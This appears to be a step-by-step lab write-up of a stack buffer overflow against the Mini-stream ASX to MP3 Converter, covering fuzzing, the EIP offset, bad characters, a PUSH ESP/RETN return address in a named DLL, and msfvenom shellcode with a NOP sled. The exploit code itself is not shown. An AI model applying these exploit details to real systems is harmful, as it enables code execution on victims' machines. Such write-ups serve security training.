search

Buffer Overflow

Step 1.

Passing the provided fuzz file breaks the application.

Step 2.

Checking the fuzz file (.asx) opening with notepad++, Gives us hint that a string starting with http:// and followed by multiple A characters.

Step 3.

Create a Python script which can also create a similar file for us.

Step 4.

Start Immunity debugger and check if the created .asx file is replacing EIP values. Application crashes with access violation error.

Step 5.

Now we have to find the exact value for EIP

5.1 Binary Tree Analysis

Sending 5000 * B from last to check if EIP is updating with the value of B.

Within some try we found that sending a * 15000 and b * 5000, updates the EIP value with B.

5.2 Sending Unique string

• Now as we know in the buffer length of 20000, EIP value updates with B within the last 5000 so we can use msfvenom script “pattern_create.rb” to create 5000 unique characters.

• After updating the code with unique characters , we got the below result:

• Now, checking the exact location of the found value.

• We can do this by another msfvenom script “pattern_offset.rb”

5.3 Basic calculation

A (15000 + 2417 = 17417) + 4 *B(value of EIP) + remaining buffer (20000-17417-4)*C

Updating the code as required :

We are able to control EIP.

Step 6.

Now we have to check the Bad characters which are either truncate the buffer or terminate the buffer. So sending all possible combination in the code.

After analysis, we found that the Bad character are null byte \x00 and carriage return \x0a

Step 7.

Now we have to find any module which does not have any protection like ASLR,REBASE,SEH,DEP,etc. To Do so we will use mona.py script within immunity debugger.

By using command “!mona modules”

we are able to identify such module which is:

Log data, item 32

Address=0BADF00D

Message= 0x10000000 | 0x1007f000 | 0x0007f000 | False | False | False | False | False | -1.0- [MSA2Mfilter03.dll] (C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll)

We can use search command in the module or search sequence string

Search command -> jmp esp (which is not found in the module)

Search sequence -> push esp

retn

Found the reliable address in memory which contain PUSH ESP and next instruction as RETN found on address:

1003DF73 54 PUSH ESP

1003DF74 C3 RETN

Step 8.

Now as we have found the Address for PUSH ESP instruction which is also not having any of our bad characters, we can pass it in our EIP using the below code.

We can see from the below screenshot we are able to PUSH ESP address into our instruction pointer which is EIP.

Step 9.

Now we are ready to pass our shell code into the remaining buffer.

To do so we need a shell code which we can get using the msfvenom.

We also know that our esp register points to the beginning of our shell code we need to provide some stack space to work the decoder which is automatically generated by msfvenom.

We will add no operation input (nops) in the code “\x90”.

Step 10.

Getting the cmd prompt.

Getting the cmd prompt opening using vulnerable application.

PreviousX Path InjectionNextBuffer-Overflow Python script

Last updated